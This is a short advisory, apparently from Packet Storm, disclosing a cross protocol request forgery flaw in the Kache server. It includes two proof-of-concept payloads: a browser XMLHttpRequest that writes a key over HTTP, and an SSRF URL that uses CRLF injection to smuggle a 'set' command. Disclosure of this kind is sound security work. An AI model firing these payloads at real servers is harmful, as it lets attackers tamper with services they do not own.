Kache as of commit de2c39491625c3f087027be961a17191e85f6d30 suffers from a cross protocol request forgery vulnerability.
3b8862a7564c2beedeae089e3379b55e9c9fa5c9b66d806b768207a65c8bba9c# Title: Kache / CPRF
# Date: 03/01/2019
# Discovered by: @codexlynx
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)
# Category: go, resp, cprf
[1]CPRF (Cross Protocol Request Forgery)
--------------------------------
Kache server don't close connection when unknown strings are received. This can allow to a malicious actor to perform cross protocol interactions.
- POC 1: Set a key by HTTP:
<script>
var x = new XMLHttpRequest();
x.open("POST", "https://<TARGET_ADDRESS>:<TARGET_PORT>");
x.send("set mykey myvalue\n");
</script>
- POC 2: Exploit this CPRF for set a key via SSRF + CRLF Injection:
https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=https://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed